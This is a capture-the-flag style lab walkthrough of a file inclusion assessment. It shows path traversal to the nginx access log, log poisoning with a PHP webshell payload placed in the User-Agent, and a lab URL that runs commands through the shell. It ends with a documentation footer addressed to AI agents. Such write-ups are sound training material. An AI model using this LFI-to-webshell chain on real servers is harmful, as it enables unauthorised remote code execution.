# Skills Assessment

The company `INLANEFREIGHT` has contracted you to perform a web application assessment against one of their public-facing websites. They have been through many assessments in the past but have added some new functionality in a hurry and are particularly concerned about file inclusion/path traversal vulnerabilities.

They provided a target IP address and no further information about their website. Perform a full assessment of the web application checking for file inclusion and path traversal vulnerabilities.

***

* Assess the web application and use a variety of techniques to gain remote code execution and find a flag in the / root directory of the file system. Submit the contents of the flag as your answer.

<figure><img src="/files/04uJ1XiZKqqWBMz63dud" alt=""><figcaption></figcaption></figure>

We can see into the main web index.php a possible FLI into pages, enumerate its -->

<figure><img src="/files/ZgK6h2ZA11PrIDlQ4vqG" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/ZHxSzr5UzZ9wCdTXQAbI" alt=""><figcaption></figcaption></figure>

I decode it and i can see it into the source code -->

<figure><img src="/files/rRz425uMhNhJIIwvR7wr" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/L5KGQVlOXUPX7LSOI3zh" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/sLFWznoLHuGBTQXtIAd0" alt=""><figcaption></figcaption></figure>

Now, we have another LFI, i will try to do a RCE -->

<figure><img src="/files/ydUfCitGa2Ijkh59qH9c" alt=""><figcaption></figcaption></figure>

With it we can see the verison of nginx, this web site use php and nginx, so, we need search of the classic directory of logs -->

<figure><img src="/files/IkAsk0udJqHL6Qhr5WZt" alt=""><figcaption></figcaption></figure>

```
../../../../../../../../var/log/nginx/access.log
```

<figure><img src="/files/u0DgQUW1xysb2UkNHDft" alt=""><figcaption></figcaption></figure>

Now, we can see that it saves the user-agent peticion so...

```
<?php system($_GET['cmd']);?>
```

<figure><img src="/files/p87f9MGrbDOOum8CkRqy" alt=""><figcaption></figcaption></figure>

Send the peticion and again see the logs with the webshell command -->

```
http://94.237.61.242:54849/ilf_admin/index.php?log=../../../../../var/log/nginx/access.log&cmd=id
```

<figure><img src="/files/Ju73mEnE3tv7gi3PUwk9" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/eH4DhRNvX7XxQhIfBPEL" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://eldeim.gitbook.io/brain_fuck/notes/certifications/eastereggs/htb-cbbh/file-inclusion/skills-assessment.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.